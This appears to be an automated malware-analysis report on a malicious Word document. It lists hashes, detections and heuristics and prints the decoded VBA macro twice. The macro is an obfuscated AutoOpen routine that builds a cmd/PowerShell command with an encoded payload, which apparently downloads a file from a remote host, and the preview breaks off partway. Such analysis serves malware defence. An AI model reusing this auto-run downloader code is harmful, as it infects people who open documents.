Office (OLE) malware analysis — malicious · 75d78787451c1a6e

MALICIOUS

Office (OLE)

155.0 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 63b53438737ea23d0ba05081f8e39434 SHA-1: 9c57d517f966dea98da65980a108a5731e7b4f83 SHA-256: 75d78787451c1a6e19100e153a19c08bdec884e49a556e32ce0bdfee762dc63e

142 Risk Score

Heuristics 5

ClamAV: Doc.Malware.Sagent-6697295-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sagent-6697295-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 53993 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	53993 bytes
SHA-256: `a5f4670b278e1397ce0f7cf60b4a1bfec2c7b075dd6dbaf92457049757683c38`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const hyilADyMIQouHYvOrYLjaEKoKYqiqOByKONiwiP = 0 Sub AutoOpen() On Error Resume Next Dim DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(4) If 12 = 12 + (4 * 0) Then DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(0) = CLng(889) End If DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(1) = Sqr(4) DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(2) = Month(889889) DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(3) = Fix(889.4) MALIBojOneDoMBEzYhOncoDESyPAFAMYTOtIlyhras = "d." + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "x" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + " /c p^O^w^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^R^s^H^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^L^L^.^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^x^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^v^A^H^c^A^a^Q^B^l^A^G^8^A^c^Q^B^r^A^H^g^A^a^w^B^h^A^G^w^A^c^w^A^u^A^G^M^A^b^w^B^t^A^C^8^A^V^g^B^S^A^E^U^A^L^w^B^r^A^G^8^A^d^A^B^u^A^G^U^A^c^g^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^G^0^A^a^Q^B^" Dim GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(4) Dim kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(4) If 12 = 12 + (4 * 0) Then kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(0) = CLng(8328) End If kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(1) = Sqr(4) kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(2) = Month(83288328) kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(3) = Fix(8328.4) Dim rIRiFojhYMICUTaneGiaWyjufyNybIJYj(4) If 10 = 10 + (5 * 0) Then rIRiFojhYMICUTaneGiaWyjufyNybIJYj(0) = CLng(888) End If rIRiFojhYMICUTaneGiaWyjufyNybIJYj(1) = Sqr(5) rIRiFojhYMICUTaneGiaWyjufyNybIJYj(2) = Month(888888) rIRiFojhYMICUTaneGiaWyjufyNybIJYj(3) = Fix(888.5) Dim SyWyDAzuRImOWAMEixEDBIhiTI(4) If 11 = 11 + (8 * 0) Then SyWyDAzuRImOWAMEixEDBIhiTI(0) = CLng(519) End If SyWyDAzuRImOWAMEixEDBIhiTI(1) = Sqr(8) SyWyDAzuRImOWAMEixEDBIhiTI(2) = Month(519519) SyWyDAzuRImOWAMEixEDBIhiTI(3) = Fix(519.8) If 13 = 13 + (8 * 0) Then Dim VHyZUlaRyaEbnInaEAbyJEquC(4) If 11 = 11 + (2 * 0) Then VHyZUlaRyaEbnInaEAbyJEquC(0) = CLng(3911) End If VHyZUlaRyaEbnInaEAbyJEquC(1) = Sqr(2) VHyZUlaRyaEbnInaEAbyJEquC(2) = Month(39113911) VHyZUlaRyaEbnInaEAbyJEquC(3) = Fix(3911.2) Dim auDevUJAleiFowQAQaGyGsugUJU(4) If 13 = 13 + (10 * 0) Then auDevUJAleiFowQAQaGyGsugUJU(0) = CLng(4203) End If auDevUJAleiFowQAQaGyGsugUJU(1) = Sqr(10) auDevUJAleiFowQAQaGyGsugUJU(2) = Month(42034203) auDevUJAleiFowQAQaGyGsugUJU(3) = Fix(4203.1) GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(0) = CLng(8281) End If GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(1) = Sqr(8) GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(2) = Month(82818281) Dim KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(4) If 10 = 10 + (4 * 0) Then KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(0) = CLng(9456) End If KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(1) = Sqr(4) KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(2) = Month(94569456) KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(3) = Fix(9456.4) Dim BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(4) If 11 = 11 + (1 * 0) Then BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(0) = CLng(7659) End If BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(1) = Sqr(1) BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(2) = Month(76597659) BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(3) = Fix(7659.1) GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(3) = Fix(8281.8) Dim HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(4) If 10 = 10 + (3 * 0) Then HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(0) = CLng(3152) End If HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(1) = Sqr(3) HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(2) = Month(31523152) HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(3) = Fix(3152.3) Dim RYSylyniHUwiNiceXZAjodAMUS(4) If 13 = 13 + (3 * ... (truncated)

SHA-256: a5f4670b278e1397ce0f7cf60b4a1bfec2c7b075dd6dbaf92457049757683c38

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const hyilADyMIQouHYvOrYLjaEKoKYqiqOByKONiwiP = 0
Sub AutoOpen()
On Error Resume Next
Dim DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(4)

If 12 = 12 + (4 * 0) Then
DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(0) = CLng(889)
End If
DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(1) = Sqr(4)
DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(2) = Month(889889)
DImKAzYcoNYTiJacEZoZOPoleHeieRadeLb(3) = Fix(889.4)
MALIBojOneDoMBEzYhOncoDESyPAFAMYTOtIlyhras = "d." + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "x" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + " /c p^O^w^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^R^s^H^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^L^L^.^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^x^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^v^A^H^c^A^a^Q^B^l^A^G^8^A^c^Q^B^r^A^H^g^A^a^w^B^h^A^G^w^A^c^w^A^u^A^G^M^A^b^w^B^t^A^C^8^A^V^g^B^S^A^E^U^A^L^w^B^r^A^G^8^A^d^A^B^u^A^G^U^A^c^g^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^G^0^A^a^Q^B^"
Dim GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(4)
Dim kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(4)

If 12 = 12 + (4 * 0) Then
kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(0) = CLng(8328)
End If
kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(1) = Sqr(4)
kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(2) = Month(83288328)
kAeqIpuJYJeWCaoXOWihEdyfuFAmEpYJYwYs(3) = Fix(8328.4)
Dim rIRiFojhYMICUTaneGiaWyjufyNybIJYj(4)

If 10 = 10 + (5 * 0) Then
rIRiFojhYMICUTaneGiaWyjufyNybIJYj(0) = CLng(888)
End If
rIRiFojhYMICUTaneGiaWyjufyNybIJYj(1) = Sqr(5)
rIRiFojhYMICUTaneGiaWyjufyNybIJYj(2) = Month(888888)
rIRiFojhYMICUTaneGiaWyjufyNybIJYj(3) = Fix(888.5)

Dim SyWyDAzuRImOWAMEixEDBIhiTI(4)

If 11 = 11 + (8 * 0) Then
SyWyDAzuRImOWAMEixEDBIhiTI(0) = CLng(519)
End If
SyWyDAzuRImOWAMEixEDBIhiTI(1) = Sqr(8)
SyWyDAzuRImOWAMEixEDBIhiTI(2) = Month(519519)
SyWyDAzuRImOWAMEixEDBIhiTI(3) = Fix(519.8)
If 13 = 13 + (8 * 0) Then
Dim VHyZUlaRyaEbnInaEAbyJEquC(4)

If 11 = 11 + (2 * 0) Then
VHyZUlaRyaEbnInaEAbyJEquC(0) = CLng(3911)
End If
VHyZUlaRyaEbnInaEAbyJEquC(1) = Sqr(2)
VHyZUlaRyaEbnInaEAbyJEquC(2) = Month(39113911)
VHyZUlaRyaEbnInaEAbyJEquC(3) = Fix(3911.2)
Dim auDevUJAleiFowQAQaGyGsugUJU(4)

If 13 = 13 + (10 * 0) Then
auDevUJAleiFowQAQaGyGsugUJU(0) = CLng(4203)
End If
auDevUJAleiFowQAQaGyGsugUJU(1) = Sqr(10)
auDevUJAleiFowQAQaGyGsugUJU(2) = Month(42034203)
auDevUJAleiFowQAQaGyGsugUJU(3) = Fix(4203.1)
GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(0) = CLng(8281)
End If
GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(1) = Sqr(8)
GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(2) = Month(82818281)
Dim KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(4)

If 10 = 10 + (4 * 0) Then
KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(0) = CLng(9456)
End If
KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(1) = Sqr(4)
KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(2) = Month(94569456)
KaVybofoCYciWeioNyrENyCuzoGAnuMEBe(3) = Fix(9456.4)
Dim BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(4)

If 11 = 11 + (1 * 0) Then
BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(0) = CLng(7659)
End If
BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(1) = Sqr(1)
BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(2) = Month(76597659)
BetiboVOtiPuNYhiGyPQoStiNeQEvOSdIsosiD(3) = Fix(7659.1)
GAJodEqKUQyvEaoHhIHiZEdIbesObiqIkunDI(3) = Fix(8281.8)
Dim HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(4)

If 10 = 10 + (3 * 0) Then
HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(0) = CLng(3152)
End If
HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(1) = Sqr(3)
HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(2) = Month(31523152)
HFIvYPEWobaRUdAxAMyPABopEMaFikOtD(3) = Fix(3152.3)
Dim RYSylyniHUwiNiceXZAjodAMUS(4)

If 13 = 13 + (3 *
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.